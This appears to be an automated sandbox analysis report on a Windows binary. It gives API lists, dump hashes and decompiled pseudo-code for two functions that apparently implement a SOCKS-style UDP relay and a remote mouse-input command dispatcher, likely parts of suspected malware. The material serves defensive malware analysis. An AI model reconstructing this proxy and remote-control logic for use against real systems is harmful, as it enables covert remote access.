      • Part of subcall function 0041F5E0: HeapFree.KERNEL32(?,00000000,?), ref: 0041F7AA
    • HeapFree.KERNEL32(?,00000000,00000000,?,00000000,?,00000001), ref: 0041FAA6
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$ByteCharMultiWide$AllocCreateInstance
    • String ID:
    • API String ID: 4163679439-0
    • Opcode ID: 335ccb6acb01ea6cbf2b5b9e09a721c886e48ed20f10ccabc657110128536479
    • Instruction ID: bf67db8c27ceb3e9aef59fbba1627ae8056701c358c620d921b0dd5f4a699517
    • Opcode Fuzzy Hash: 335ccb6acb01ea6cbf2b5b9e09a721c886e48ed20f10ccabc657110128536479
    • Instruction Fuzzy Hash: 21818F71204302AFD710DA59DC80FAB77E9EFC8744F10452EFA4897291DA78DD8ACBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E00409349(void* __ebx, void* __esi, void* __ebp, char _a4, char _a12, void* _a16, signed int _a24, signed int _a28, void* _a30, char _a32, signed int _a36, signed int _a40, signed int _a44, void* _a48, signed int _a52, char _a56, char _a62, signed short _a72, char _a76, char _a80, char _a96, char _a220, signed int _a240, signed int _a244, signed int _a248, signed int _a252, void* _a424, void* _a436, signed short _a448, short _a704, void* _a708, char _a712, char _a716, void* _a728, intOrPtr _a844, signed int _a848, signed int _a1232, signed int _a1256, signed int _a1276) {
    				signed int _v0;
    				signed int _v4;
    				signed int _v8;
    				signed int _v12;
    				void* _v16;
    				signed int _v20;
    				signed int _v24;
    				signed char _v25;
    				signed int _v28;
    				void* _v32;
    				void* _v36;
    				void* _v44;
    				void* _v52;
    				void* _t120;
    
    				while(1) {
    					__al =  *((intOrPtr*)(__esp + __esi + 0x380));
    					__cl =  *((intOrPtr*)(__esp + __esi + 0x68));
    					__eflags = __al - __cl;
    					if(__al != __cl) {
    						goto L16;
    					}
    					L14:
    					__esi = __esi + 1;
    					__eflags = __esi - 0x10;
    					if(__esi < 0x10) {
    						continue;
    					} else {
    						L18:
    						__eflags =  *(__ebx + 2);
    						if( *(__ebx + 2) != 0) {
    							L50:
    							__esi = _a36;
    							__eflags = __esi - 0xffffffff;
    							if(__esi != 0xffffffff) {
    								__edx =  &_a240;
    								__eax = E00414B60( &_a240, __esi);
    								__eflags = __al;
    								if(__al != 0) {
    									__ecx =  &_a32;
    									__edx =  &_a96;
    									0xffff = 0xffff - __edi;
    									__ecx = __ebx + __edi;
    									__imp__#17(__esi, __ebx + __edi, 0xffff, 0, __edx,  &_a32);
    									__ebp = _a28;
    									__eflags = 0xffff - __edi;
    									if(0xffff - __edi > 0) {
    										L54:
    										__ecx = 0;
    										 *__ebx = __cx;
    										 *(__ebx + 2) = __cl;
    										__eflags = _a72 - 0x17;
    										__edx = __edx & 0xffffff00 | _a72 != 0x00000017;
    										__dl = __dl - 1;
    										__dl = __dl & 0x00000003;
    										__dl = __dl + 1;
    										 *(__ebx + 3) = __dl;
    										__eflags = __ebp - 0x17;
    										if(__ebp != 0x17) {
    											__eflags = __ebp - 2;
    											if(__ebp == 2) {
    												_push(4);
    												__ecx =  &_a76;
    												goto L58;
    											}
    										} else {
    											_push(0x10);
    											__ecx =  &_a80;
    											L58:
    											_t94 = __ebx + 4; // 0x4
    											__edx = _t94;
    											__eax = E00410820();
    											__ecx =  &_a62;
    											_t97 = __edi - 2; // -2
    											__edx = __ebx + _t97;
    											__eax = E00410820(__ebx + _t97,  &_a62, 2);
    											__ecx = _v24;
    											__edx =  &_a712;
    											__eax = __eax + __edi;
    											__eflags = __eax;
    											__eax = _v4;
    											__imp__#20(_v4, __ebx, __eax, 0,  &_a712, _v24, _t94, __ecx);
    										}
    									} else {
    										__edx = _a72 & 0x0000ffff;
    										__eflags = __ebp - __edx;
    										if(__ebp == __edx) {
    											goto L54;
    										}
    									}
    								}
    							}
    							__edx = _a1276;
    							__eax = _a44;
    							__ecx = 0;
    							__eflags = __esi - 0xffffffff;
    							__ecx = 0 | __eflags != 0x00000000;
    							_a244 = _a1276;
    							_a248 = __eax;
    							_a252 = __esi;
    							__ecx = (__eflags != 0) + 2;
    							_a240 = (__eflags != 0) + 2;
    							__ecx =  &_a240;
    							__imp__#18(0,  &_a240, 0, 0, 0);
    							__eflags = __eax;
    							if(__eax > 0) {
    								__ebp = _a24;
    								__esi = _a1256;
    								__edx =  &_a220;
    								__eax = E00414B60( &_a220, __esi);
    								__eflags = __al;
    								if(__al == 0) {
    									goto L5;
    								} else {
    									__imp__#16(__esi, __ebx, 0xffff, 0);
    									__eflags = __eax;
    									if(__eax > 0) {
    										goto L5;
    									}
    								}
    							}
    						} else {
    							__eax = 0;
    							__eflags =  *__ebx - __ax;
    							if( *__ebx != __ax) {
    								goto L50;
    							} else {
    								__eflags = _v20;
    								if(_v20 == 0) {
    									__edx = _v12;
    									__ecx =  &_a52;
    									__edx =  &_a716;
    									__eax = E00410820( &_a716,  &_a52, _v12);
    									__eflags = _a704 - 0x17;
    									if(_a704 == 0x17) {
    										 *(__esp + 0x310) = __eax;
    										 *(__esp + 0x2fc) = __eax;
    									}
    									__ecx = _v12;
    									_v20 = _v12;
    								}
    								__edx =  &_a52;
    								__eax =  *(__ebx + 3) & 0x000000ff;
    								__eax = ( *(__ebx + 3) & 0x000000ff) - 1;
    								__eflags = __eax;
    								if(__eax == 0) {
    									__eflags = __ebp - 0xa;
    									if(__ebp <= 0xa) {
    										goto L50;
    									} else {
    										_t60 = __ebx + 4; // 0x4
    										__eax = _t60;
    										__ecx =  &_a56;
    										__edx = 2;
    										_v12 = 0x10;
    										_a52 = __dx;
    										__eax = E00410820( &_a56, _t60, 4);
    										__esi = 8;
    										goto L44;
    									}
    								} else {
    									__eax = __eax - 2;
    									__eflags = __eax;
    									if(__eax == 0) {
    										__al =  *(__ebx + 4);
    										__eflags = __al;
    										if(__al != 0) {
    											__eax = __al & 0x000000ff;
    											__ecx = __eax + 7;
    											__eflags = __ebp - __eax + 7;
    											if(__ebp > __eax + 7) {
    												_t37 = __ebx + 5; // 0x5
    												__edx = _t37;
    												__ecx = __esp + 0x200;
    												__eax = E00410820(__esp + 0x200, _t37, __eax);
    												__edx =  &_a4;
    												 *((char*)(__esp + __eax + 0x200)) = 0;
    												_t42 = __eax + 5; // 0x5
    												__esi = _t42;
    												__eax =  &_a448;
    												_a4 = 0;
    												__imp__getaddrinfo(__eax, 0, 0,  &_a4);
    												__eflags = __eax;
    												if(__eax == 0) {
    													__ebp = _v0;
    													__dl = 0;
    													__eflags = 0;
    													do {
    														__eax = __ebp;
    														__eflags = __ebp;
    														if(__ebp == 0) {
    															goto L37;
    														} else {
    															__ecx = __dl & 0x000000ff;
    															__ecx =  *(__esp + 0x48 + (__dl & 0x000000ff) * 4);
    															while(1) {
    																__eflags =  *((intOrPtr*)(__eax + 4)) - __ecx;
    																if( *((intOrPtr*)(__eax + 4)) == __ecx) {
    																	break;
    																}
    																__eax =  *(__eax + 0x1c);
    																__eflags = __eax;
    																if(__eax != 0) {
    																	continue;
    																} else {
    																	goto L37;
    																}
    																goto L60;
    															}
    															__ecx =  *(__eax + 0x10);
    															_v28 =  *(__eax + 0x10);
    															__edx = ( &_a36)[6];
    															 &_a36 = E00410820( &_a36, ( &_a36)[6], __ecx);
    															__eflags = _a24 - 0x17;
    															if(_a24 == 0x17) {
    																__eax = 0;
    																__eflags = 0;
    																 *((intOrPtr*)(__esp + 0x78)) = 0;
    																_a40 = 0;
    															}
    															__ecx = _v0;
    															__imp__freeaddrinfo(_v0);
    															__ebp =  *(__esp + 0x54);
    															goto L44;
    														}
    														goto L60;
    														L37:
    														__dl = __dl + 1;
    														__eflags = __dl - 2;
    													} while (__dl < 2);
    												}
    											}
    										}
    										goto L50;
    									} else {
    										__eax = __eax - 1;
    										__eflags = __eax;
    										if(__eax != 0) {
    											goto L50;
    										} else {
    											__eflags = __ebp - 0x16;
    											if(__ebp <= 0x16) {
    												goto L50;
    											} else {
    												_t30 = __ebx + 4; // 0x4
    												__ecx = _t30;
    												__edx = __esp + 0x70;
    												__eax = 0x17;
    												_v12 = 0x1c;
    												_a52 = __ax;
    												_t34 = E00410820(__esp + 0x70, _t30, 0x10) - 3; // -3
    												__esi = _t34;
    												L44:
    												__dx =  *(__ebx + __esi);
    												__esi = __esi + 2;
    												__eflags = _v8 - 0xffffffff;
    												 *((short*)(__esp + 0x62)) = __dx;
    												if(_v8 != 0xffffffff) {
    													L47:
    													__eflags = __ebp - __esi;
    													if(__ebp > __esi) {
    														__edx = _a52 & 0x0000ffff;
    														__eflags =  *(__esp + 0x34) - (_a52 & 0x0000ffff);
    														if( *(__esp + 0x34) == (_a52 & 0x0000ffff)) {
    															__eax = _v12;
    															__eax = _v8;
    															__ecx =  &_a52;
    															__ebp = __ebp - __esi;
    															__eflags = __ebp;
    															__edx = __ebx + __esi;
    															__imp__#20(_v8, __ebx + __esi, __ebp, 0,  &_a52, _v12);
    														}
    													}
    													goto L50;
    													do {
    														do {
    															do {
    																goto L50;
    																L5:
    																__edx =  &_a220;
    																__esi = __ebp;
    																_a12 = 0x80;
    																__eax = E00414B60( &_a220, __ebp);
    																__eflags = __al;
    															} while (__al == 0);
    															__edx = _a24;
    															__eax =  &_a12;
    															__ecx =  &_a76;
    															__imp__#17(_a24, __ebx, 0xffff, 0,  &_a76, __eax);
    															__ebp = __eax;
    															_a40 = __ebp;
    															__eflags = __ebp;
    															if(__ebp > 0) {
    																goto L7;
    															}
    															goto L60;
    															L7:
    															__eflags = __ebp - 6;
    														} while (__ebp < 6);
    														__ax = _a52;
    														__eflags = _a844 - __ax;
    													} while (_a844 != __ax);
    													__eflags = __ax - 2;
    													if(__ax != 2) {
    														__eflags = __ax - 0x17;
    														if(__ax != 0x17) {
    															goto L18;
    														} else {
    															__esi = 0;
    															while(1) {
    																__al =  *((intOrPtr*)(__esp + __esi + 0x380));
    																__cl =  *((intOrPtr*)(__esp + __esi + 0x68));
    																__eflags = __al - __cl;
    																if(__al != __cl) {
    																	goto L16;
    																}
    																goto L14;
    															}
    															goto L16;
    														}
    													} else {
    														__eax = _a848;
    														__eflags = _a848 - _a56;
    														L17:
    														if(__eflags != 0) {
    															goto L50;
    														} else {
    															goto L18;
    														}
    													}
    												} else {
    													__esp + 0x200 = E00410870(__esp + 0x200, __eax, 0, 0x80);
    													__ax = _a40;
    													__ecx = __ax & 0x0000ffff;
    													__edi =  &_a448;
    													_a448 = __ax;
    													_v4 = __ax & 0x0000ffff;
    													__eax = E00415320( &_a448);
    													_v20 = __eax;
    													__eflags = __eax - 0xffffffff;
    													if(__eax != 0xffffffff) {
    														 *(__esp + 0x34) =  *(__esp + 0x34) - 0x17;
    														__edi =  ~( *(__esp + 0x34) - 0x17);
    														asm("sbb edi, edi");
    														__edi =  ~( *(__esp + 0x34) - 0x17) & 0xfffffff4;
    														__edi = ( ~( *(__esp + 0x34) - 0x17) & 0xfffffff4) + 0x16;
    														__eflags = __edi;
    														goto L47;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					L60:
    					__esi = _v8;
    					__eax = E004152D0(__eax, _v8);
    					__ebp = _v0;
    					__eax = __ebx;
    					__eax = E004107C0(__ebx);
    					__esi = _v0;
    					__eax = E004152D0(__eax, __esi);
    					_a4 = E004107C0(_a4);
    					__al = _v25;
    					__eflags = _v25 - 1;
    					if(_v25 != 1) {
    						L1:
    						return _t120;
    					} else {
    						__eflags = _v24;
    						if(_v24 == 0) {
    							goto L1;
    						} else {
    							__edx = _v4;
    							__eax = _v24;
    							__ecx = _a1232;
    							_push(_v4);
    							__eax = _v24 | 0xffffffff;
    							__eax = E00408CE0(_v24 | 0xffffffff, _a1232, __eax);
    							_pop(__edi);
    							_pop(__esi);
    							__eflags = __eax;
    							_pop(__ebp);
    							_t119 = __eax != 0;
    							__eflags = _t119;
    							__eax = __eax & 0xffffff00 | _t119;
    							_pop(__ebx);
    							__esp = __esp + 0x4e8;
    							return __eax;
    						}
    					}
    					L16:
    					__ecx = __cl & 0x000000ff;
    					__al & 0x000000ff = (__al & 0x000000ff) - (__cl & 0x000000ff);
    					__eflags = (__al & 0x000000ff) - (__cl & 0x000000ff);
    					goto L17;
    				}
    			}


















    APIs
    • getaddrinfo.WS2_32(?,00000000), ref: 00409471
    • sendto.WS2_32(00000001,00000017,00000000,00000000,?,00000080), ref: 0040959F
    • recvfrom.WS2_32(000000FF,00000080,0000FFFF,00000000,?,00000080), ref: 004095DF
    • sendto.WS2_32(?,00000000,00000000,00000000,?,00000000), ref: 0040965C
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: sendto$getaddrinforecvfrom
    • String ID:
    • API String ID: 43035728-0
    • Opcode ID: bc1bb69daaf6dcf0d9b57f56232e275b9751d6ac2cd795a8fff03965cd9da1d2
    • Instruction ID: 1540b4e63258d7c4570a20e4c524607f5c691ad94eb72f74025f99fd132bb67f
    • Opcode Fuzzy Hash: bc1bb69daaf6dcf0d9b57f56232e275b9751d6ac2cd795a8fff03965cd9da1d2
    • Instruction Fuzzy Hash: 9E71D5724083419BD724DB25C885BAFB3E5AFC8704F044E2EF4955B2C2E278DD45CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E004067E7(void* __esi) {
    				signed int _t147;
    				void* _t157;
    				void* _t158;
    				void* _t161;
    				intOrPtr _t163;
    				void* _t165;
    				void* _t170;
    				void* _t174;
    				void* _t192;
    				void* _t197;
    				signed int _t200;
    				void* _t201;
    				void* _t202;
    
    				L0:
    				while(E00414C40(_t170, __esi, 1) != 0) {
    					__eax = __esp + 0x48;
    					2 = E00414B90(2, __ebx, __esi, __esp + 0x48);
    					if(__al == 0) {
    						break;
    					}
    					__ecx =  *(__esp + 0x48) & 0x0000ffff;
    					__ebp =  *(__esp + 0x20);
    					__ecx = __ecx & 0x000000ff;
    					__eax = (__ecx & 0x000000ff) << 8;
    					__eax = __eax | __ecx;
    					 *(__ebp + 0x4c) = 0;
    					 *(__ebp + 0x48) = __ax;
    					if(__ax == 0) {
    						L39:
    						__eax =  *(__ebp + 0x4c);
    						__eax = __eax << 0x10;
    						__eax = __eax & 0x0000ff00;
    						__edx = __eax << 0x00000010 | __eax & 0x0000ff00;
    						__eax = __eax >> 8;
    						__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 8;
    						__ecx = __eax >> 0x00000008 & 0x0000ff00;
    						__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00;
    						__ecx =  *(__ebp + 0x4f) & 0x000000ff;
    						__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00 |  *(__ebp + 0x4f) & 0x000000ff;
    						 *(__ebp + 0x50) = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00 |  *(__ebp + 0x4f) & 0x000000ff;
    						if(__eax != 5) {
    							__eax =  *(__ebp + 0x1c);
    							__eax = E004107C0( *(__ebp + 0x1c));
    							 *(__ebp + 0x1c) = 0;
    							L1:
    							while(1) {
    								L1:
    								while(1) {
    									L1:
    									while(1) {
    										L1:
    										while(1) {
    											L1:
    											while( *(_t202 + 0x24) > 0) {
    												_t157 = E004151B0(0, _t202 + 0x194, 0x12c, 0);
    												if(_t157 != 0xffffffff) {
    													break;
    												}
    												__imp__#111();
    												if(_t157 != 0x274c) {
    													goto L83;
    												} else {
    													_t158 =  *(_t202 + 0x19c);
    													if(_t158 != 0) {
    														WaitForSingleObject(_t158, 0xffffffff);
    													}
    													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x194)) + 0x10))))();
    													_t200 =  *(_t202 + 0x24);
    													_t192 = 0;
    													if(_t200 == 0) {
    														L17:
    														_t161 =  *(_t202 + 0x19c);
    														if(_t161 != 0) {
    															ReleaseMutex(_t161);
    														}
    														continue;
    													} else {
    														_t174 = 0;
    														_t201 = _t200 + _t200 * 8;
    														do {
    															_t163 =  *((intOrPtr*)(_t202 + 0x14));
    															_t197 = _t174 + _t163;
    															if( *((short*)(_t174 + _t163 + 5)) > 0 &&  *((short*)(_t197 + 7)) > 0) {
    																_t165 = E00405C70( *((intOrPtr*)(_t202 + 0x20)),  *((intOrPtr*)(_t202 + 0x190)), _t197);
    																if(_t165 == 0xffffffff || _t165 == 0) {
    																	if( *(_t202 + 0x19c) != 0) {
    																		ReleaseMutex( *(_t202 + 0x19c));
    																	}
    																	goto L83;
    																} else {
    																	if(_t165 == 1) {
    																		_t16 = _t192 + 1; // 0x1
    																		if(_t16 !=  *(_t202 + 0x24)) {
    																			E00410870(_t165, _t197, 0, 9);
    																		} else {
    																			 *(_t202 + 0x24) =  *(_t202 + 0x24) - 1;
    																			_t201 = _t201 - 9;
    																			E00410740(_t201, _t202 + 0x14);
    																		}
    																	}
    																	goto L16;
    																}
    															}
    															L16:
    															_t192 = _t192 + 1;
    															_t174 = _t174 + 9;
    														} while (_t192 <  *(_t202 + 0x24));
    														goto L17;
    													}
    												}
    											}
    											if(E00414B90(1,  *((intOrPtr*)(_t202 + 0x190)), 0x1b7740, _t202 + 0x13) == 0) {
    												goto L83;
    											}
    											_t147 =  *(_t202 + 0x13) & 0x000000ff;
    											if(_t147 > 6) {
    												goto L83;
    											}
    											switch( *((intOrPtr*)(_t147 * 4 +  &M00406C98))) {
    												case 0:
    													if(E00414C40(_t172, 0x1b7740, 3) == 0 || E00414B90(0x10, _t172, 0x1b7740, _t202 + 0x4c) == 0) {
    														goto L83;
    													} else {
    														_t151 =  *(_t202 + 0x4c);
    														if(_t151 == 0x20 || _t151 == 0x10 || _t151 == 8) {
    															if( *((char*)(_t202 + 0x4f)) == 0) {
    																goto L83;
    															}
    															_t182 =  *((intOrPtr*)(_t202 + 0x50));
    															asm("rol dx, 0x8");
    															asm("rol ax, 0x8");
    															asm("rol cx, 0x8");
    															 *((short*)(_t202 + 0x5c)) =  *((intOrPtr*)(_t202 + 0x54));
    															 *(_t202 + 0x58) = _t182;
    															 *((char*)(_t202 + 0x5b)) = 1;
    															 *((char*)(_t202 + 0x5a)) = _t182 & 0xffffff00 |  *((char*)(_t202 + 0x52)) != 0x00000000;
    															 *(E00410820( *((intOrPtr*)(_t202 + 0x28)) + 0x31, _t202 + 0x50, 0x10) + 0x41) =  *(_t202 + 0x4c) >> 3;
    															goto L1;
    														} else {
    															goto L83;
    														}
    													}
    												case 1:
    													goto L83;
    												case 2:
    													goto L0;
    												case 3:
    													__edx = __esp + 0x38;
    													9 = E00414B90(9, __ebx, __esi, __esp + 0x38);
    													if(__al == 0) {
    														goto L83;
    													}
    													__eax =  *(__esp + 0x39) & 0x0000ffff;
    													__dx =  *((intOrPtr*)(__esp + 0x3d));
    													asm("rol ax, 0x8");
    													asm("rol cx, 0x8");
    													 *(__esp + 0x39) = __ax;
    													__eax =  *(__esp + 0x3f) & 0x0000ffff;
    													asm("rol dx, 0x8");
    													asm("rol ax, 0x8");
    													__ecx = __ecx & 0xffffff00 |  *(__esp + 0x38) != 0x00000000;
    													 *(__esp + 0x38) = __cl;
    													__ecx =  *(__esp + 0x24);
    													__edi = 0;
    													 *((short*)(__esp + 0x3d)) = __dx;
    													 *(__esp + 0x3f) = __ax;
    													if(__ecx == 0) {
    														L50:
    														if(__edi != __ecx) {
    															L52:
    															__eax =  *(__esp + 0x14);
    															__edx = __esp + 0x3c;
    															__eax + __edi * 8 = __eax + __edi * 8 + __edi;
    															__eax = E00410820(__eax + __edi * 8 + __edi, __esp + 0x3c, 9);
    															goto L1;
    														}
    														__ecx = __ecx + 1;
    														 *(__esp + 0x24) = __ecx;
    														__ecx = __ecx + __ecx * 8;
    														__esi = __esp + 0x14;
    														__eax = E00410740(__ecx, __esi);
    														if(__al == 0) {
    															goto L83;
    														}
    														goto L52;
    													}
    													__eax =  *(__esp + 0x14);
    													__eax =  *(__esp + 0x14) + 7;
    													while( *((short*)(__eax - 2)) != 0 ||  *__eax != 0) {
    														__edi = __edi + 1;
    														__eax = __eax + 9;
    														if(__edi < __ecx) {
    															continue;
    														}
    														goto L50;
    													}
    													goto L50;
    												case 4:
    													__edx = __esp + 0x74;
    													__eax = 7;
    													__eax = E00414B90(7, __ebx, __esi, __esp + 0x74);
    													if(__al == 0) {
    														goto L83;
    													}
    													__eax = __eax & 0xffffff00 |  *(__esp + 0x74) != 0x00000000;
    													__ecx = __al & 0x000000ff;
    													__eax =  *(__esp + 0x77);
    													_push(__al & 0x000000ff);
    													__edx = __eax;
    													__eax = __eax >> 0x10;
    													__edx = __eax & 0x00ff0000;
    													__edx = __eax & 0x00ff0000 | __eax >> 0x00000010;
    													__ecx = __eax;
    													__ecx = __eax << 0x10;
    													__ecx = __ecx | __eax;
    													__eax =  *(__esp + 0x198);
    													__ecx = __ecx << 8;
    													__edx = __edx | __ecx;
    													__ecx =  *__eax;
    													__eax =  *(__eax + 0x14);
    													__eax =  *__eax();
    													goto L1;
    												case 5:
    													__ecx = __esp + 0x18;
    													5 = E00414B90(5, __ebx, __esi, __esp + 0x18);
    													if(__al == 0) {
    														goto L83;
    													}
    													__dx =  *(__esp + 0x19);
    													__ax =  *(__esp + 0x1b);
    													asm("rol dx, 0x8");
    													asm("rol ax, 0x8");
    													 *((short*)(__esp + 0x1d)) = __dx;
    													 *(__esp + 0x1f) = __ax;
    													__edi = 0;
    													__esi = 0x8000;
    													GetSystemMetrics(0x17) = __eax & 0xffffff00 | __eax != 0x00000000;
    													if( *(__esp + 0x19) !=  *((intOrPtr*)(__esp + 0x31))) {
    														L58:
    														__esi = 0x8001;
    														L59:
    														__dl =  *((intOrPtr*)(__esp + 0x30));
    														__cl =  *(__esp + 0x18);
    														__cl =  *(__esp + 0x18) & 0x00000001;
    														if(__cl != (__dl & 0x00000001)) {
    															__ecx = __al & 0x000000ff;
    															if(__cl == 0) {
    																__ecx =  ~__ecx;
    																asm("sbb ecx, ecx");
    																__ecx = __ecx & 0x0000000c;
    																__ecx = __ecx + 4;
    															} else {
    																__ecx =  ~__ecx;
    																asm("sbb ecx, ecx");
    																__ecx = __ecx & 0x00000006;
    																__ecx = __ecx + 2;
    															}
    															__esi = __esi | __ecx;
    														}
    														__cl =  *(__esp + 0x18);
    														__cl =  *(__esp + 0x18) & 0x00000004;
    														if(__cl != (__dl & 0x00000004)) {
    															if(__cl == 0) {
    																__al & 0x000000ff =  ~(__al & 0x000000ff);
    																asm("sbb ecx, ecx");
    																 ~(__al & 0x000000ff) & 0xfffffff4 = ( ~(__al & 0x000000ff) & 0xfffffff4) + 0x10;
    																__esi = __esi | ( ~(__al & 0x000000ff) & 0xfffffff4) + 0x00000010;
    															} else {
    																__al & 0x000000ff =  ~(__al & 0x000000ff);
    																asm("sbb eax, eax");
    																 ~(__al & 0x000000ff) & 0xfffffffa = ( ~(__al & 0x000000ff) & 0xfffffffa) + 8;
    																__esi = __esi | ( ~(__al & 0x000000ff) & 0xfffffffa) + 0x00000008;
    															}
    														}
    														__cl =  *(__esp + 0x18);
    														__al = __cl;
    														__al = __cl & 0x00000002;
    														if(__al != __dl) {
    															__al & 0x000000ff =  ~(__al & 0x000000ff);
    															asm("sbb edx, edx");
    															 ~(__al & 0x000000ff) & 0xffffffe0 = ( ~(__al & 0x000000ff) & 0xffffffe0) + 0x40;
    															__esi = __esi | ( ~(__al & 0x000000ff) & 0xffffffe0) + 0x00000040;
    														}
    														if((__cl & 0x00000008) != 0) {
    															__esi = __esi | 0x00000800;
    															__edi = 0x78;
    														}
    														if((__cl & 0x00000010) != 0) {
    															__esi = __esi | 0x00000800;
    															__edi = 0xffffff88;
    														}
    														__eax = __esp + 0x1c;
    														__ecx = __esp + 0x38;
    														__eax = E00410820(__esp + 0x38, __esp + 0x1c, 5);
    														__edx =  *(__esp + 0x1b) & 0x0000ffff;
    														__eax =  *(__esp + 0x19) & 0x0000ffff;
    														_push(__edi);
    														_push(__edx);
    														_push(__eax);
    														__eax =  *(__esp + 0x1a0);
    														__ecx =  *__eax;
    														__eax =  *(__eax + 0x18);
    														__edx = __esi;
    														__eax =  *__eax();
    														goto L1;
    													}
    													__dx =  *((intOrPtr*)(__esp + 0x33));
    													if( *(__esp + 0x1b) == __dx) {
    														goto L59;
    													}
    													goto L58;
    												case 6:
    													__ecx = __esp + 0x7c;
    													3 = E00414B90(3, __ebx, __esi, __esp + 0x7c);
    													if(__al == 0) {
    														goto L83;
    													}
    													__edx = __esp + 0x2c;
    													4 = E00414B90(4, __ebx, __esi, __esp + 0x2c);
    													if(__al == 0) {
    														goto L83;
    													}
    													__ecx =  *(__esp + 0x2c);
    													__ecx = __ecx & 0x00ff0000;
    													__ecx = __ecx >> 0x10;
    													__eax = __ecx & 0x00ff0000 | __ecx >> 0x00000010;
    													__edx = __ecx;
    													__edx = __ecx << 0x10;
    													__edx = __edx | __ecx;
    													__eax = __eax >> 8;
    													__eax = __eax | __edx;
    													 *(__esp + 0x2c) = __eax;
    													__eax = __eax + 1;
    													__edi = __eax;
    													if(__edi == 0) {
    														0 = E004107C0(0);
    														goto L83;
    													}
    													 *(__esp + 0x2c) = E00414B90( *(__esp + 0x2c), __ebx, __esi, __edi);
    													if(__al == 0) {
    														goto L83;
    													}
    													__eax =  *(__esp + 0x194);
    													__ecx =  *__eax;
    													__edx =  *(__esp + 0x2c);
    													__eax =  *(__eax + 0x1c);
    													_push(__edi);
    													__eax =  *__eax();
    													__eax = __edi;
    													__eax = E004107C0(__edi);
    													goto L1;
    											}
    										}
    									}
    								}
    							}
    						}
    						if( *(__ebp + 0x1c) != 0) {
    							goto L1;
    						}
    						__edx =  *0x42e6d4;
    						__eax = HeapAlloc( *0x42e6d4, 8, 0x404);
    						__ecx =  *(__esp + 0x20);
    						 *( *(__esp + 0x20) + 0x1c) = __eax;
    						if(__eax != 0) {
    							goto L1;
    						}
    						break;
    					}
    					__ebx = __ax & 0x0000ffff;
    					__ebx = (__ax & 0x0000ffff) + (__ax & 0x0000ffff);
    					__ebx = (__ax & 0x0000ffff) + (__ax & 0x0000ffff) + (__ax & 0x0000ffff) + (__ax & 0x0000ffff);
    					__edi = __ebp + 0x44;
    					__ecx = __ebx;
    					__esi = __edi;
    					__eax = E00410740(__ebx, __esi);
    					if(__al == 0) {
    						break;
    					}
    					__ecx =  *__edi;
    					__eax = __ebx;
    					__ebx =  *(__esp + 0x190);
    					__esi = 0x1b7740;
    					__eax = E00414B90(__eax, __ebx, 0x1b7740,  *__edi);
    					if(__al == 0) {
    						break;
    					}
    					__edx = 0;
    					__esi = 0;
    					if(__dx >=  *(__ebp + 0x48)) {
    						goto L39;
    					}
    					__edx =  *__edi;
    					do {
    						__eax = __si & 0x0000ffff;
    						__eax = (__si & 0x0000ffff) + (__si & 0x0000ffff);
    						__eax = (__si & 0x0000ffff) + (__si & 0x0000ffff) + (__si & 0x0000ffff) + (__si & 0x0000ffff);
    						__ecx =  *(__edx + __eax);
    						__ecx = __ecx << 0x10;
    						__ecx = __ecx & 0x0000ff00;
    						__ebx = __ecx << 0x00000010 | __ecx & 0x0000ff00;
    						__ebp =  *(__eax + __edx + 3) & 0x000000ff;
    						__ebx = (__ecx << 0x00000010 | __ecx & 0x0000ff00) << 8;
    						__ecx = __ecx >> 8;
    						__ebx = __ebx |  *(__eax + __edx + 3) & 0x000000ff;
    						__ebx = __ebx | __ecx;
    						 *(__edx + __eax) = __ebx;
    						__edx =  *__edi;
    						if( *(__edx + __eax) == 5) {
    							__eax =  *(__esp + 0x20);
    							 *((intOrPtr*)( *(__esp + 0x20) + 0x4c)) = 5;
    						}
    						__ecx =  *(__esp + 0x20);
    						__esi = __esi + 1;
    					} while (__si <  *((intOrPtr*)(__ecx + 0x48)));
    					__ebp = __ecx;
    					goto L39;
    				}
    				L83:
    				E00406260( *((intOrPtr*)(_t202 + 0x20)));
    				return E004107C0( *((intOrPtr*)(_t202 + 0x14)));
    			}
















    0x00406c19
    0x00406c1c
    0x00406c1d
    0x00406c1f
    0x00406c21
    0x00000000
    0x00000000
    0x0040673b
    0x0040660f
    0x0040660f
    0x0040660f
    0x0040660f
    0x00406905
    0x00000000
    0x00000000
    0x0040690b
    0x00406919
    0x0040691f
    0x00406923
    0x00406928
    0x00000000
    0x00000000
    0x00000000
    0x0040692e
    0x0040683b
    0x0040683e
    0x00406840
    0x00406842
    0x00406845
    0x00406847
    0x00406849
    0x00406850
    0x00000000
    0x00000000
    0x00406856
    0x00406858
    0x0040685a
    0x00406862
    0x00406867
    0x0040686e
    0x00000000
    0x00000000
    0x00406874
    0x00406876
    0x0040687c
    0x00000000
    0x00000000
    0x0040687e
    0x00406880
    0x00406880
    0x00406883
    0x00406885
    0x00406887
    0x0040688c
    0x00406891
    0x00406897
    0x00406899
    0x0040689e
    0x004068a1
    0x004068a4
    0x004068ac
    0x004068ae
    0x004068b1
    0x004068b7
    0x004068b9
    0x004068bd
    0x004068bd
    0x004068c4
    0x004068c8
    0x004068c9
    0x004068cf
    0x00000000
    0x004068cf
    0x00406c4c
    0x00406c50
    0x00406c68

